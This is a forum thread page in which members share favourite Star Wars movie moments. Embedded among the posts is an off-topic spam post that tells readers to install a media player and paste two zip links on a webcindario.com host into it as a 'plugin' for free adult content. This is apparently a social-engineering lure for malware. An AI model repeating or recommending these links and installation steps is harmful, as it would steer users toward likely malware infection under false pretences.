The Best Star Wars Movie Moments

Page 2 - Seeking answers? Join the Tom's Hardware community: where nearly two million members share solutions and discuss the latest tech.

Fridel

Distinguished
Aug 10, 2009
I consider all 6 to be the same movie. I'm a big fan. But if I have to answer, most fans consider Empire (V) to be the best. It had a good director and the acting was good. The bad guys won. Episode 3 and 2 had good stories but the acting wasn't very good.

G

First time poster, long time lurker! I want to start out by saying thanks to everyone in this forum for all the content and sharing…good stuff. I recently came across a media player called AAA Media Player. Not here to promote the player, just this amazing plugin I found in the IRC community and I wanted to give back to you all. Get the player from download.com. Then watch the video about how to install a plugin. It’s real easy, but you will need this link: http://luisbernalaaa.webcindario.com/adultpack2.zip. Do NOT download the file, it will do you no good. All you need is the link. Copy and paste the link into the media player when installing the plugin and you will have access to unlimited free adult content. Incredible. No need to hit sites and worry about spyware. Just download this free app and use this free plugin and you are set. Thanks again for allowing me to be a part of your community!!

PS – Just ran across this foot fetish plugin :) You]http://luisbernalaaa.webcindario.com/footfetishtube.zip
won’t want to miss out on this…

ToreTrygg

Distinguished
Oct 15, 2009
Don`t forget about Interview with the Vampire: The Vampire Chronicles.
Remember?

Claudia:Vampires, pretending to be humans, pretending to be vampires. Such Avant-garde!

GunBladeType-T

Distinguished
Jul 8, 2010
Coolest Moments were Darth Vader and The Emperor feuding, which was more powerful the tesla shock vs. The magnetic suffocate you with the power glove. Phantom Menace Darth Maul surprise ambush vs. everyone!The Biker Speeding race remind me of F-Zero!Chewbacca and Hans Solo as the bridge argueing!Clone wars were everyone is fighting in the arena was pretty Cool too.

TRENDING THREADS